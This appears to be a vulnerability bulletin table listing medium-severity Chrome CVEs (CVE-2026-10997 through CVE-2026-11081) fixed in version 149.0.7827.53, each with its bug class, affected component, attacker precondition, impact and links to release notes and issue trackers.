| Google--Chrome | Insufficient policy enforcement in Extensions in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to bypass discretionary access control via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-10997 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/464217867 |
| Google--Chrome | Out of bounds read in Media in Google Chrome prior to 149.0.7827.53 allowed an attacker on the local network segment to perform an out of bounds memory read via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-10998 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/486536242 |
| Google--Chrome | Integer overflow in ANGLE in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-10999 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/489369089 |
| Google--Chrome | Use after free in Fonts in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11000 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/492374380 |
| Google--Chrome | Inappropriate implementation in Payments in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11001 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/493691489 |
| Google--Chrome | Use after free in Autofill in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11002 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/494740162 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11003 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/494823867 |
| Google--Chrome | Out of bounds read in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11004 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/494823889 |
| Google--Chrome | Out of bounds read in ANGLE in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11005 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495052581 |
| Google--Chrome | Out of bounds read in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11006 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495489174 |
| Google--Chrome | Insufficient validation of untrusted input in WebView in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11007 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495834228 |
| Google--Chrome | Insufficient validation of untrusted input in WebAppInstalls in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11008 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495864099 |
| Google--Chrome | Use after free in USB in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11009 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496233132 |
| Google--Chrome | Use after free in WebShare in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11010 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496266444 |
| Google--Chrome | Insufficient policy enforcement in Password Manager in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11011 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496702621 |
| Google--Chrome | Use after free in Serial in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11012 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497000161 |
| Google--Chrome | Insufficient validation of untrusted input in Network in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11013 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497056412 |
| Google--Chrome | Insufficient policy enforcement in Extensions in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to bypass site isolation via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11014 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497058611 |
| Google--Chrome | Out of bounds read in WebGPU in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11015 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497183443 |
| Google--Chrome | Insufficient validation of untrusted input in Network in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11016 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497278395 |
| Google--Chrome | Inappropriate implementation in Link Preview in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11017 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497336872 |
| Google--Chrome | Insufficient policy enforcement in Actor in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11018 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497342466 |
| Google--Chrome | Inappropriate implementation in Payments in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to perform domain spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11019 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497344640 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted XML file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11020 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497440270 |
| Google--Chrome | Insufficient validation of untrusted input in GPU in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11021 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497487755 |
| Google--Chrome | Insufficient validation of untrusted input in DevTools in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11022 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497532918 |
| Google--Chrome | Inappropriate implementation in WebAppInstalls in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11023 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497538899 |
| Google--Chrome | Stack buffer overflow in Skia in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially exploit stack corruption via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11024 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497591594 |
| Google--Chrome | Insufficient policy enforcement in Navigation in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11025 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497595264 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to bypass navigation restrictions via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11026 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497599683 |
| Google--Chrome | Insufficient validation of untrusted input in Glic in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11027 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497604407 |
| Google--Chrome | Use after free in Media in Google Chrome on Linux and ChromeOS prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11028 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497627277 |
| Google--Chrome | Insufficient validation of untrusted input in Drag and Drop in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11029 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497651688 |
| Google--Chrome | Use after free in Network in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially exploit heap corruption via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11030 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497722502 |
| Google--Chrome | Insufficient validation of untrusted input in Password Manager in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11031 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497748760 |
| Google--Chrome | Inappropriate implementation in Password Manager in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11032 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497831111 |
| Google--Chrome | Uninitialized Use in WebML in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11033 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497926664 |
| Google--Chrome | Insufficient validation of untrusted input in Tab Group Sync in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11034 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497934980 |
| Google--Chrome | Inappropriate implementation in Custom Tabs in Google Chrome on Android prior to 149.0.7827.53 allowed a local attacker to perform privilege escalation via a crafted XML file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11035 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497936421 |
| Google--Chrome | Inappropriate implementation in DOM in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11036 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497964917 |
| Google--Chrome | Out of bounds write in Codecs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted video file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11037 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497971287 |
| Google--Chrome | Insufficient policy enforcement in Subresource Integrity in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass content security policy via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11038 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498080391 |
| Google--Chrome | Uninitialized Use in Skia in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11039 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498204112 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11040 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498371085 |
| Google--Chrome | Insufficient validation of untrusted input in Media in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11041 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498700369 |
| Google--Chrome | Use after free in Views in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11042 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498720094 |
| Google--Chrome | Out of bounds write in ANGLE in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11043 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498721316 |
| Google--Chrome | Integer overflow in ANGLE in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11044 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498724803 |
| Google--Chrome | Insufficient validation of untrusted input in GPU in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11045 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498727111 |
| Google--Chrome | Insufficient validation of untrusted input in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11046 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498728857 |
| Google--Chrome | Inappropriate implementation in Base in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11047 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498768132 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to bypass same origin policy via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11048 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498808432 |
| Google--Chrome | Use after free in Password Manager in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11049 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498815068 |
| Google--Chrome | Use after free in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11050 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498818402 |
| Google--Chrome | Out of bounds read in ANGLE in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11051 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498828605 |
| Google--Chrome | Type Confusion in GPU in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11052 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498834967 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11054 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498845284 |
| Google--Chrome | Use after free in ANGLE in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11055 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498881735 |
| Google--Chrome | Insufficient validation of untrusted input in SiteIsolation in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11056 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498887785 |
| Google--Chrome | Uninitialized Use in Skia in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11057 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498951946 |
| Google--Chrome | Integer overflow in CredentialProvider in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to perform OS-level privilege escalation via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11058 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498986406 |
| Google--Chrome | Use after free in Blink in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11059 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498991983 |
| Google--Chrome | Use after free in Media in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11060 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499018355 |
| Google--Chrome | Type Confusion in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11061 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499031961 |
| Google--Chrome | Insufficient policy enforcement in Extensions in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to inject scripts or HTML into a privileged page via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11062 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499033012 |
| Google--Chrome | Insufficient validation of untrusted input in WebNN in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11063 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499051067 |
| Google--Chrome | Race in GPU in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11064 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499075743 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11065 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499093536 |
| Google--Chrome | Insufficient validation of untrusted input in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11066 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499124128 |
| Google--Chrome | Uninitialized Use in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11067 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499140183 |
| Google--Chrome | Use after free in WebSockets in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11068 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499194333 |
| Google--Chrome | Insufficient validation of untrusted input in Cast in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11069 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499213367 |
| Google--Chrome | Insufficient validation of untrusted input in Chromoting in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the network process to potentially perform a sandbox escape via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11070 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499225384 |
| Google--Chrome | Use after free in Base in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11071 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499227659 |
| Google--Chrome | Use after free in WebView in Google Chrome on Android prior to 149.0.7827.53 allowed a local attacker to execute arbitrary code via a malicious file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11072 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499238195 |
| Google--Chrome | Use after free in WebGL in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11073 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499365904 |
| Google--Chrome | Use after free in WebRTC in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11074 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499587071 |
| Google--Chrome | Out of bounds read in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11075 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499659070 |
| Google--Chrome | Type Confusion in CSS in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11076 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499784386 |
| Google--Chrome | Bad cast in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11077 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499908918 |
| Google--Chrome | Inappropriate implementation in FileSystem in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11078 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499917177 |
| Google--Chrome | Insufficient validation of untrusted input in Codecs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform an out of bounds memory write via a crafted video file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11079 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500028989 |
| Google--Chrome | Use after free in WebView in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11080 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500032538 |
| Google--Chrome | Inappropriate implementation in Canvas in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11081 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500076131 |
